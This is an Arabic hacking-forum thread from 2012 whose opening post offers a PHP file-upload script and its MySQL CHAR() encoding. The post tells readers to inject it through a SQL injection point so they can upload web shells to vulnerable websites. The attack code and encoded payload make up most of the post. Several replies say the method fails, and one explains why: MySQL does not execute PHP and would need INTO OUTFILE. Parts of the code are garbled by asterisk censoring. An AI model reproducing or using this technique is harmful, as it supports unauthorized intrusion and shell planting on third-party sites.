استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

T-VAIROS Dz · 01-31-2012, 04:06 PM

السلام عليكم ورحمة الله وبركاته ...
قبل فترة اكثر من شهر خطرت ببالي فكرة ...

هي شلون نعمل مركز رفع من الخلال المواقع المصابة بـ SQL

الطريقة كالتالي ...

ناخذ سكربت مركز الرفع وهذا الكود بتاعه ...

كود PHP:

 
 <?php  
echo '<b>Upload Center</b>'; 
echo '<b><br><br>'.php_u****().'<br></b>'; 
echo '<form action="" method="post" enctype="multipart/form-data" ****="uploader" id="uploader">'; 
echo '<input type="file" ****="file" size="50"><input ****="_upl" type="submit" id="_upl" value="Upload"></form>'; 
if( $_POST***91;'_upl'***93; == "Upload" ){ if(@copy($_FILES***91;'file'***93;***91;'tmp_****'***93;, $_FILES***91;'file'***93;***91;'****'***93;)) { echo '<b>Done !!!</b><br><br>'; } 
 else { echo '<b>!!!!!!!Upload Failed!!!!!! </b><br><br>'; }}?>

لازم تكون هاذي اداة Hack Bar منصب على الفيرفوكس بتاعك

من هنا تضيف اداة

https://addons.mozilla.org/en-US/firefox/addon/hackbar/

ونروح على ادادة Hack Bar الموجودة بالفايرفوكس ونختار

SQL > MySQL > MySQLCHAR

راح يظهر مستطيل صغير تخليه بيه اكواد مركز الرفع الي فوق وتضغك ok راح تحصل هذه التشفيرة

CHAR(60, 63, 112, 104, 112, 32, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 85, 112, 108, 111, 97, 100, 32, 67, 101, 110, 116, 101, 114, 60, 47, 98, 62, 39, 59, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 60, 98, 114, 62, 60, 98, 114, 62, 39, 46, 112, 104, 112, 95, 117, 42, 42, 42, 42, 40, 41, 46, 39, 60, 98, 114, 62, 60, 47, 98, 62, 39, 59, 32, 101, 99, 104, 111, 32, 39, 60, 102, 111, 114, 109, 32, 97, 99, 116, 105, 111, 110, 61, 34, 34, 32, 109, 101, 116, 104, 111, 100, 61, 34, 112, 111, 115, 116, 34, 32, 101, 110, 99, 116, 121, 112, 101, 61, 34, 109, 117, 108, 116, 105, 112, 97, 114, 116, 47, 102, 111, 114, 109, 45, 100, 97, 116, 97, 34, 32, 42, 42, 42, 42, 61, 34, 117, 112, 108, 111, 97, 100, 101, 114, 34, 32, 105, 100, 61, 34, 117, 112, 108, 111, 97, 100, 101, 114, 34, 62, 39, 59, 32, 101, 99, 104, 111, 32, 39, 60, 105, 110, 112, 117, 116, 32, 116, 121, 112, 101, 61, 34, 102, 105, 108, 101, 34, 32, 42, 42, 42, 42, 61, 34, 102, 105, 108, 101, 34, 32, 115, 105, 122, 101, 61, 34, 53, 48, 34, 62, 60, 105, 110, 112, 117, 116, 32, 42, 42, 42, 42, 61, 34, 95, 117, 112, 108, 34, 32, 116, 121, 112, 101, 61, 34, 115, 117, 98, 109, 105, 116, 34, 32, 105, 100, 61, 34, 95, 117, 112, 108, 34, 32, 118, 97, 108, 117, 101, 61, 34, 85, 112, 108, 111, 97, 100, 34, 62, 60, 47, 102, 111, 114, 109, 62, 39, 59, 32, 105, 102, 40, 32, 36, 95, 80, 79, 83, 84, 91, 39, 95, 117, 112, 108, 39, 93, 32, 61, 61, 32, 34, 85, 112, 108, 111, 97, 100, 34, 32, 41, 123, 32, 105, 102, 40, 64, 99, 111, 112, 121, 40, 36, 95, 70, 73, 76, 69, 83, 91, 39, 102, 105, 108, 101, 39, 93, 91, 39, 116, 109, 112, 95, 42, 42, 42, 42, 39, 93, 44, 32, 36, 95, 70, 73, 76, 69, 83, 91, 39, 102, 105, 108, 101, 39, 93, 91, 39, 42, 42, 42, 42, 39, 93, 41, 41, 32, 123, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 68, 111, 110, 101, 32, 33, 33, 33, 60, 47, 98, 62, 60, 98, 114, 62, 60, 98, 114, 62, 39, 59, 32, 125, 32, 32, 101, 108, 115, 101, 32, 123, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 33, 33, 33, 33, 33, 33, 33, 85, 112, 108, 111, 97, 100, 32, 70, 97, 105, 108, 101, 100, 33, 33, 33, 33, 33, 33, 32, 60, 47, 98, 62, 60, 98, 114, 62, 60, 98, 114, 62, 39, 59, 32, 125, 125, 63, 62)

-----------------------------

بعدها تاخذها على طول للعمود المصاب وتخليه مكانه وتضغط انتر وان شاء الله تشوف مركز الرفع امامك

ومن خلال المركز تكدر ترفع ملفاتك حتى الشل وتم التجربة وحمد لله انرفع لكن المشكلة بتحديد مساره

طيب يجي واحد يسأل كيف عرفت انرفع ..؟ لو ما انرفع كان السكربت طبع لك upload faild ....

واعتقد حل مشكلة المسار هي تنصيب سكربت مصاب على السيرفر الشخصي وتطبيق الفكرة ونشوف الشل وين ..

تحياتي اخوT-VIROS Dzـــــكم

المصدر: :: vBspiders Professional Network ::

hsjyghg eyvhj SQL Inj3ti0n td hkahx lv;. vtu gvtu hgag avp>vtu>adg>sql

fantome195 · 01-31-2012, 04:33 PM

مشكور يا أخي الله ينورك

aircrack -ng · 01-31-2012, 04:44 PM

الفكره هاي جربناها منذ سنتين لكن فاشله ماراح تنجح

T-VAIROS Dz · 01-31-2012, 05:13 PM

هناك مشكل في مسار الشيل فقط وراح اكشف المسار اشناء الله
يا اخي Spartacus

aircrack -ng · 01-31-2012, 05:36 PM

تعرف كيف يعمل مركز التحميل كله مربوط بالقاعده
مستحيل انه يرفع بدون ماتكون عندك فكره عن القاعده تبعه واليوزر كمان

DZ.CRYPTE.DZ · 01-31-2012, 06:12 PM

اقتباس

المشاركة الأصلية كتبت بواسطة Spartacus


	تعرف كيف يعمل مركز التحميل كله مربوط بالقاعده مستحيل انه يرفع بدون ماتكون عندك فكره عن القاعده تبعه واليوزر كمان

fantome195 · 01-31-2012, 10:48 PM

المهم هو رفع الشيل أذا اترفع فسأبحث عن طريق برامج التجسس ع المواقع وأبسط متال ع ذلك INTELLITAMPER (به تغرة ولكنه مفيد)

stremsysteme · 02-08-2012, 09:08 PM

لم تنجح معي

أسدالله الدمشقي · 02-12-2012, 05:12 AM

صحيح اخي يصير مركز لاكن ما يدعم ارفع وهذه قصة طويله تتعلق بلغة البرمجة بي اتش بي وال اتش تي ام ال والدوال الممنوعة وامور عديدة جدن

abdinho05 · 02-17-2012, 06:10 AM

شكرا اخي
لكن لا تعمل هذه الطريقة

JetLi · 02-17-2012, 07:04 PM

السلام عليكم ، اعود بعد انقطاع عن المنتدى بيتنا العناكب
ههه ربما فترة بيات شتوي

بالنسبة للأخ الكريم هذه فكرة جميلة ولكن لا تنجح لسبب بسيط وسأشرحه لك هنا :
بالنسبة للحقن فإن غالبية التنفيذ تقع على برنامج Mysql او الداتابيز وربما في حالات نادرة يتحكم الكود في بعض اكواد الحقن.
طيب الحين وضعت الكود ما النتيجة ؟ المتوقعه انه يظهر في الصفحة كما هو دون اي تغيير لانه يحتاج إلى دالة eval بداخل php ليكي ينفذ ككود php ؟ يعني بي اختصار
mysql لا تنفذ كود php ولكن php تستدعي اكواد sql لتنفيذها بواسطة mysql server

رأيت هذه التجربة من قبل على ما اعتقد التنفيذ يتطلب حفظ هذا الكود باستخدام outfile بشروطها المعقدة.

ولك جزيل شركي لا تيأس ابدا فإنت في الطريق الصحيح وحاول جرب فأغب الثغرات والطرق ناتجة عن تجربة المختلف والغريب وغير الممكن ..
لك تحياتي صاحب الموضوع